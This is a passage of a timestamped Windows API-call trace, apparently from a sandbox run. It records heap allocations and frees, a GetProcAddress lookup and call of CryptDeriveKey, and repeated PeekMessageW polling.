Size=0x8) returned 0x2e54d28 [0258.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0258.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0258.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0258.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0258.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0258.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0258.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0258.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0258.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0258.909] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0258.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0258.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0258.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0258.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0258.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0258.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0258.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0258.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0258.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0258.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0258.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0258.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0258.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0258.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0258.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0258.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0258.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0258.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0258.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0258.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0258.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0258.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0258.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0258.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0258.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0258.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0258.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0258.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0258.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0258.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0258.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0258.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0258.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0258.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0258.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0258.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0258.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0258.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0258.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0258.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0258.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0258.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0258.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51838 [0258.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51838, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0258.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0258.913] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0258.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0258.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0258.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0258.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0258.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0258.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0258.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0258.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0258.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0258.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0258.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0258.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0258.914] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87710) returned 1 [0258.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0258.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0258.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0258.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0258.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0258.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0258.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0258.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0258.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0258.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0258.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0258.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0258.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0258.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0258.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0258.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0258.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0258.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0258.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0258.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0258.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0258.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0258.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0258.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0258.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0258.918] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0258.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0258.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0258.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0258.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0258.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0258.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0258.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0258.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0258.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0258.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0258.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0258.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0258.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0258.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0258.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0258.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0258.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0258.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0258.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 